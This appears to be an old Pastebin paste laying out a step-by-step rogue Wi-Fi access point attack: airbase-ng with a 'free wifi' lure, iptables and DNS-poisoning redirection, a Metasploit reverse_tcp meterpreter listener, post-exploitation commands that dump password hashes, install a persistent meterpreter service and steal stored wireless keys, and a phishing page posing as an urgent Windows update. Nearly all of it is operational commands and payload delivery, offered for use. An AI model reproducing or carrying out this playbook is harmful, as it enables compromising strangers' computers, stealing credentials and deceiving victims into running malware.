Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

HM

By: a guest on Nov 19th, 2008  |  syntax: Bash  |  size: 5.71 KB  |  views: 1,168  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.  
  2. dhclient wlan0                               //// Connect to the internet, can be eth0
  3.  
  4.  
  5.  
  6. *****Setup metasploit listener*********        ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places  http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
  7. cd /
  8. cd pentest
  9. cd exploits
  10. cd framework3
  11. ./msfconsole
  12. use exploit/multi/handler
  13. set PAYLOAD windows/meterpreter/reverse_tcp
  14. set LHOST 10.0.0.1
  15. set LPORT 55555
  16. show options
  17. exploit
  18.  
  19.  
  20.  
  21.  
  22. modprobe tun
  23. airbase-ng -P -C 30 -e "free wifi" wlan1 -v   ////// can use various commands here
  24.  
  25. *************************
  26. Transparent Airbase
  27. *************************
  28. su
  29. ***************
  30. ifconfig lo up
  31. ifconfig at0 up
  32. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  33. ifconfig at0 mtu 1400
  34. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  35. iptables --flush
  36. iptables --table nat --flush
  37. iptables --delete-chain
  38. iptables --table nat --delete-chain
  39. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1                         ////router address
  40. iptables -P FORWARD ACCEPT
  41. iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE         wlan0 = route to the internet
  42. /etc/init.d/dhcp3-server restart                                                      // backtrack users use dhcpd
  43. /etc/init.d/lighttpd stop
  44. lighttpd -D -f '/home/hm/Desktop/http/http'                                           //webserver with fake update page
  45.  
  46.  
  47. **********************************************************************
  48. direct any request to apache
  49. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1               //redirector
  50. **********************************************************************
  51. allow traffic again
  52. ifconfig lo up
  53. ifconfig at0 up
  54. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  55. ifconfig at0 mtu 1400
  56. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  57. iptables --flush
  58. iptables --table nat --flush
  59. iptables --delete-chain
  60. iptables --table nat --delete-chain
  61. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
  62. iptables -P FORWARD ACCEPT
  63. iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
  64. **************************************************************************
  65. **************************************************************************
  66. **************************************************************************
  67.  
  68. NON Transparent Airbase
  69. su
  70. ***************
  71. modprobe tun
  72. airbase-ng -P -C 30 -e "free wifi" wlan1 -v  
  73.  
  74. su
  75. ***************
  76. ifconfig at0 up
  77. ifconfig lo up
  78. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  79. ifconfig at0 mtu 1400
  80. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  81. iptables --flush
  82. iptables --table nat --flush
  83. iptables --delete-chain
  84. iptables --table nat --delete-chain
  85. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
  86. iptables -P FORWARD ACCEPT
  87. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  88. /etc/init.d/dhcp3-server restart
  89. /etc/init.d/lighttpd stop
  90. lighttpd -D -f '/home/hm/Desktop/http/http'
  91.  
  92. cd /                                                                       /// dnspoison available at http://dnspentest.sourceforge.net/
  93. cd home
  94. cd hm
  95. cd Desktop
  96. cd dnspoison
  97. java ServerKernelMain 10.0.0.1 10.0.0.1                                    
  98.  
  99. ****************************************************************************
  100.  
  101.  
  102. **** Check for victims ********
  103. arp -n -v -i at0
  104.  
  105.  
  106.  
  107.  
  108.  
  109. session - l
  110. session -i
  111. sysinfo
  112. getuid
  113. use priv
  114. hashdump
  115.  
  116.  
  117. ***download keys*****
  118. mkdir c:\\windows\\wkviewer4
  119. cd \
  120. cd windows
  121. cd wkviewer
  122. upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4                            ///wireless key viewer
  123. upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4                            /// executes bat script... check below
  124. upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4                 //meterpreter server
  125. upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4                
  126. upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4                        //meterpreter server
  127. execute -H -f wkv.bat
  128. cat wkv.txt
  129. download wkv.txt /home/hm/Desktop/http/wkv.txt
  130.  
  131.  
  132. misc......
  133.  
  134.  
  135.  
  136. wkv bat file =
  137. wkv.exe /stabular wkv.txt
  138. metsvc.exe install-service
  139.  
  140.  
  141. Index html -
  142.  
  143. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  144. <html xmlns="http://www.w3.org/1999/xhtml">
  145. <head>
  146. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  147. <title>Untitled Document</title>
  148. <style type="text/css">
  149. <!--
  150. .style2 {
  151.         font-family: Arial, Helvetica, sans-serif;
  152.         font-weight: bold;
  153.         font-size: 24px;
  154.         color: #999999;
  155. }
  156. .style3 {
  157.         font-family: Arial, Helvetica, sans-serif;
  158.         color: #666666;
  159.         font-weight: bold;
  160. }
  161. .style4 {
  162.         font-family: Arial, Helvetica, sans-serif;
  163.         color: #666666;
  164.         font-weight: bold;
  165.         font-size: 24px;
  166. }
  167. -->
  168. </style>
  169. <script src="/AC_RunActiveContent.js" type="text/javascript"></script>
  170. </head>
  171.  
  172. <body>
  173. <p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
  174. <p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
  175. <p align="center">
  176. <input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
  177.  
  178.  
  179. </p>
  180. <p align="center" class="style2"></p>
  181. <p>&nbsp;</p>
  182. <form id="form1" name="form1" method="post" action="/upgrade.exe">
  183.   <label for="D"></label>
  184. </form>
  185. <p align="left" class="style4">&nbsp;</p>
  186. </body>
  187. </html>